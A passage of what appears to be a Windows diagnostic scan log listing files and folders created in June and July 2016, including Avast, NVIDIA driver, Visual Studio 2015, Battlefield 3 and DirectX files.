2016-07-13 19:24 - 2016-07-13 19:24 - 00108304 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00103064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00074544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00053208 _____ (AVAST Software) C:\Windows\avastSS.scr
2016-07-13 19:24 - 2016-07-13 19:24 - 00037656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00003922 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-07-13 19:24 - 2016-07-13 19:24 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-07-13 19:24 - 2016-07-13 19:24 - 00000000 ____D C:\Program Files\Common Files\AV
2016-07-13 19:24 - 2016-07-13 19:23 - 01070904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2016-07-13 19:23 - 2016-07-13 19:26 - 00000000 ____D C:\Program Files\AVAST Software
2016-07-13 19:22 - 2016-07-13 19:26 - 00000000 ____D C:\ProgramData\AVAST Software
2016-07-13 19:22 - 2016-07-13 19:22 - 06253800 _____ (AVAST Software) C:\Users\User not found\Downloads\avast_free_antivirus_setup_online.exe
2016-07-13 15:44 - 2016-07-13 18:18 - 00000000 ____D C:\Users\User not found\AppData\Roaming\NVIDIA
2016-07-12 19:20 - 2016-07-12 19:20 - 06079168 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2016-07-11 18:17 - 2016-07-11 18:17 - 00000000 ____D C:\Users\User not found\AppData\Local\NVIDIA Corporation
2016-07-11 18:16 - 2016-07-11 18:16 - 00000000 ____D C:\Users\User not found\AppData\Local\NVIDIA
2016-07-11 18:16 - 2016-06-29 23:44 - 00112216 _____ C:\Windows\system32\NvRtmpStreamer64.dll
2016-07-11 18:15 - 2016-07-11 18:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-07-11 18:15 - 2016-06-29 23:44 - 01767944 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01756424 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01377800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01316184 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Windows\SysWOW64\NV
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Windows\system32\NV
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2016-07-11 18:14 - 2016-06-29 19:36 - 06364728 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 02455608 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 01762752 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 01352760 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2016-07-11 18:14 - 2016-06-29 19:36 - 00532416 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00393784 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00083512 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00069568 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2016-07-11 18:14 - 2016-06-23 09:04 - 07208075 _____ C:\Windows\system32\nvcoproc.bin
2016-07-11 18:14 - 2016-05-04 03:23 - 00129824 _____ C:\Windows\SysWOW64\vulkan-1.dll
2016-07-11 18:14 - 2016-05-04 03:22 - 00130848 _____ C:\Windows\system32\vulkan-1.dll
2016-07-11 18:14 - 2016-05-04 03:22 - 00045344 _____ C:\Windows\system32\vulkaninfo.exe
2016-07-11 18:14 - 2016-05-04 03:22 - 00040224 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2016-07-11 18:13 - 2016-07-11 18:17 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-07-11 18:06 - 2016-06-29 23:44 - 39979576 _____ C:\Windows\system32\nvcompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 35115968 _____ C:\Windows\SysWOW64\nvcompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 31626808 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 25402424 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 19199216 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 17302264 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 16774904 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 14356952 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 13523392 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 10672752 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 10656296 _____ C:\Windows\system32\nvptxJitCompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 10214760 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 09006760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 08742032 _____ C:\Windows\SysWOW64\nvptxJitCompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 08600904 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03828968 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03513400 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03387080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03067448 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 01922616 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6436869.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 01571776 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6436869.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00984000 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00909248 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00771640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00707520 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00669952 _____ C:\Windows\system32\nvfatbinaryLoader.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00565392 _____ C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00476664 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00394912 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00178136 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00155768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00153416 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00131768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00113216 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00102976 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00056384 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 00039124 _____ C:\Windows\system32\nvinfo.pb
2016-07-11 18:06 - 2016-06-29 23:44 - 00038336 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvpciflt.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 00000594 _____ C:\Windows\SysWOW64\nv-vk32.json
2016-07-11 18:06 - 2016-06-29 23:44 - 00000594 _____ C:\Windows\system32\nv-vk64.json
2016-07-11 18:02 - 2016-07-11 18:02 - 00000000 ____D C:\NVIDIA
2016-07-10 14:33 - 2016-07-10 14:34 - 348045000 _____ (NVIDIA Corporation) C:\Users\User not found\Downloads\368.69-notebook-win8-win7-64bit-international-whql.exe
2016-07-06 00:18 - 2016-07-06 00:18 - 00000990 _____ C:\Users\User not found\Desktop\Problemas da net.txt
2016-07-04 17:31 - 2016-07-04 17:39 - 00000000 ____D C:\Users\User not found\Desktop\Fotos
2016-07-04 16:33 - 2016-07-04 16:33 - 00280904 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2016-07-04 16:33 - 2016-07-04 16:33 - 00000000 ____D C:\Users\User not found\AppData\Local\PunkBuster
2016-07-04 16:32 - 2016-07-04 16:32 - 01640768 _____ C:\Users\User not found\Downloads\battlelog-web-plugins_2.7.1_162.exe
2016-07-04 16:32 - 2016-07-04 16:32 - 00000000 ____D C:\Users\User not found\AppData\Local\ESN
2016-07-04 16:32 - 2016-07-04 16:32 - 00000000 ____D C:\Program Files (x86)\Battlelog Web Plugins
2016-07-02 19:42 - 2016-07-02 19:42 - 00000000 ____D C:\Users\User not found\AppData\Roaming\NuGet
2016-07-02 19:42 - 2016-07-02 19:42 - 00000000 ____D C:\Users\User not found\AppData\LocalLow\Temp
2016-07-02 19:35 - 2016-07-02 19:35 - 00000000 ____D C:\ProgramData\Microsoft Visual Studio
2016-07-02 19:31 - 2016-07-02 19:31 - 00000000 ____D C:\Users\User not found\.dnx
2016-07-02 15:46 - 2016-07-15 14:34 - 00000000 ____D C:\Users\User not found\Documents\Visual Studio 2015
2016-07-02 15:42 - 2016-07-02 15:42 - 00000000 ____D C:\Program Files (x86)\AppInsights
2016-07-02 15:36 - 2016-07-02 15:36 - 00000000 ____D C:\ProgramData\PreEmptive Solutions
2016-07-02 15:34 - 2016-07-02 15:34 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 11.0
2016-07-02 15:22 - 2016-07-02 15:23 - 00000000 ____D C:\Program Files (x86)\Microsoft ASP.NET
2016-07-02 15:16 - 2016-07-02 15:34 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 12.0
2016-07-02 15:16 - 2016-07-02 15:16 - 00000000 ____D C:\Program Files\Microsoft Visual Studio 12.0
2016-07-02 15:13 - 2016-07-02 15:13 - 00000000 ____D C:\Program Files\IIS Express
2016-07-02 15:13 - 2016-07-02 15:13 - 00000000 ____D C:\Program Files (x86)\IIS Express
2016-07-02 15:12 - 2016-07-02 15:12 - 00000000 ____D C:\ProgramData\NuGet
2016-07-02 15:12 - 2016-07-02 15:12 - 00000000 ____D C:\Program Files (x86)\NuGet
2016-07-02 15:11 - 2016-07-02 15:11 - 00000000 ____D C:\Users\User not found\AppData\Local\VSIXInstaller
2016-07-02 15:11 - 2016-07-02 15:11 - 00000000 ____D C:\Program Files (x86)\Microsoft Office365 Tools
2016-07-02 15:02 - 2016-07-02 15:02 - 00030400 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2016-07-02 15:02 - 2016-07-02 15:02 - 00028352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2016-07-02 14:44 - 2016-07-02 14:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-07-02 14:44 - 2016-07-02 14:44 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-07-02 14:42 - 2016-07-02 14:43 - 00000000 ____D C:\Program Files (x86)\Microsoft SQL Server Compact Edition
2016-07-02 14:42 - 2016-07-02 14:42 - 00000000 ____D C:\Program Files\Microsoft SQL Server Compact Edition
2016-07-02 14:40 - 2016-07-02 14:40 - 00000000 ____D C:\Program Files (x86)\ShellDir
2016-07-02 14:37 - 2016-07-02 14:37 - 00000000 ____D C:\ProgramData\Microsoft DNX
2016-07-02 14:37 - 2016-07-02 14:37 - 00000000 ____D C:\Program Files\Microsoft DNX
2016-07-02 14:32 - 2016-07-02 15:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Web Tools
2016-07-02 14:30 - 2016-07-02 14:30 - 00000000 ____D C:\Program Files (x86)\Microsoft WCF Data Services
2016-07-02 14:29 - 2016-07-02 14:29 - 00000000 ____D C:\Program Files\IIS
2016-07-02 14:29 - 2016-07-02 14:29 - 00000000 ____D C:\Program Files (x86)\IIS
2016-07-02 14:28 - 2016-07-02 14:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Expression
2016-07-02 14:27 - 2016-07-02 15:11 - 00001554 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2015.lnk
2016-07-02 14:25 - 2016-07-02 14:25 - 00001417 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Test Manager 2015.lnk
2016-07-02 14:23 - 2016-07-02 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2015
2016-07-02 14:22 - 2016-07-02 14:41 - 00000000 ____D C:\Program Files (x86)\Windows Kits
2016-07-02 14:22 - 2016-07-02 14:22 - 00000000 ____D C:\Windows\symbols
2016-07-02 14:22 - 2016-07-02 14:22 - 00000000 ____D C:\Program Files (x86)\Microsoft Help Viewer
2016-07-02 14:20 - 2016-07-02 15:37 - 00000000 ____D C:\Program Files\Microsoft SQL Server
2016-07-02 14:20 - 2016-07-02 15:37 - 00000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2016-07-02 14:20 - 2016-07-02 14:56 - 00000000 ____D C:\Windows\SysWOW64\1033
2016-07-02 14:20 - 2016-07-02 14:55 - 00001555 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2015.lnk
2016-07-02 14:17 - 2016-07-02 14:21 - 00000000 ____D C:\Windows\system32\1033
2016-07-02 14:17 - 2016-07-02 14:17 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_SensorsSimulatorDriver_01_11_00.Wdf
2016-07-02 14:13 - 2016-07-02 15:36 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 14.0
2016-07-02 14:13 - 2016-07-02 15:34 - 00000000 ____D C:\Program Files (x86)\Microsoft SDKs
2016-07-02 14:01 - 2016-07-02 14:01 - 00000000 ____D C:\ProgramData\VsTelemetry
2016-07-02 12:36 - 2016-07-02 12:36 - 00000000 ____D C:\Users\User not found\Downloads\Visual Studio 2015 Enterprice ISO + Serial Keys - [Fullstuff]
2016-06-29 16:58 - 2016-06-29 16:58 - 00000000 _RSHD C:\Users\User not found\AppData\Roaming\WindowsServices
2016-06-28 16:33 - 2016-07-02 15:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-06-27 17:18 - 2016-07-04 16:33 - 00000000 ____D C:\Users\User not found\Documents\Battlefield 3
2016-06-25 18:16 - 2016-06-28 16:43 - 00000000 ____D C:\ProgramData\EA Logs
2016-06-25 18:16 - 2016-06-25 18:16 - 00000000 ____D C:\ProgramData\EA Core
2016-06-23 21:38 - 2016-06-23 21:38 - 00001186 _____ C:\Users\Public\Desktop\Battlefield 3.lnk
2016-06-23 21:38 - 2016-06-23 21:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield 3
2016-06-23 21:21 - 2016-07-04 16:33 - 00280904 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2016-06-23 21:21 - 2016-06-23 21:38 - 00189248 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2016-06-23 21:21 - 2016-06-23 21:38 - 00075136 _____ C:\Windows\SysWOW64\PnkBstrA.exe
2016-06-23 21:21 - 2010-06-02 04:55 - 00527192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00518488 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00077656 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_5.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02526056 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02106216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00276832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00248672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_43.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00528216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_4.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_7.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00517960 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00515416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00176968 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00073544 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00069464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_3.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 05554512 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 05501792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 02582888 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 02475352 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 01974616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 01892184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00523088 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00285024 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00235344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_42.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00521560 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00517448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00235352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00174936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_6.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 05425496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 04178264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 02430312 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 01846632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 00520544 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_41.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 05631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 02605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 00519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2016-06-23 21:21 - 2008-07-31 10:40 - 00513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2016-06-23 21:21 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2016-06-23 21:21 - 2008-07-10 11:01 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 04992520 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 03851784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 01942552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 01493528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2016-06-23 21:20 - 2008-05-30 14:19 - 00511496 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2016-06-23 21:20 - 2008-05-30 14:19 - 00507400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_1.dll
2016-06-23 21:20 - 2008-05-30 14:18 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_1.dll
2016-06-23 21:20 - 2008-05-30 14:18 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00068104 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00065032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_0.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_4.dll
2016-06-23 21:20 - 2008-05-30 14:16 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 04991496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 03850760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 01941528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 01491992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
